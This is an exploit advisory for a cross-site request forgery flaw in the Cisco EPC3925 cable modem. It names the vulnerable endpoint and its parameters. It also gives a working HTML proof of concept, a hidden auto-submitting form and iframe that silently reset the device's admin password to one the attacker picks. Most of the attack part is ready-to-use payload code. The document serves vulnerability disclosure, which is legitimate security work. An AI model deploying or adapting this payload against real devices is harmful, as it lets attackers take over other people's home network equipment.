Cisco EPC3925 Cross Site Request Forgery

`#######################################################################  
# Exploit Title: Cisco EPC3925 � Cross Site Request Forgery  
# Google Dork: N/A  
# Date: 12-11-2013  
# Exploit Author: Jeroen - IT Nerdbox  
# Vendor Homepage: http://www.cisco.com  
# Software Link: Not public  
# Version: epc3925-E10-5-v302r125572-130520c  
# Tested on: Cisco EPC3925  
# CVE: N/A  
#######################################################################  
# Description:  
#  
# This proof of concept demonstrates that the admin password can be  
# changed by an attacker in a CSRF attack. However, it seems like any  
# setting in the device can be manipulated using an attack like this.  
#  
#  
# Side note: The device does not ask for the current password.  
#   
#  
# Location:  
#  
# POST http://[target]/goform/Quick_setup  
#  
# Parameters:  
#  
# Password=&PasswordReEnter=&save=Save+Settings  
#  
# PoC:  
#  
# <html>  
#  
# <form name="reseller" method="POST"  
action="http://[target]/goform/Quick_setup" id="csrf_attack"  
target="csrf_iframe">  
# <input type="hidden" name="Password" value="attackers_password">  
# <input type="hidden" name="PasswordReEnter" value="attackers_password">  
# <input type="hidden" name="save" value="Save Settings">  
# </form>  
#  
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>  
#  
# <script>  
# document.getElementById('csrf_attack').submit();  
# </script>  
# <center>The payload has been executed....</center>  
#  
# </html>  
#  
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/  
  
`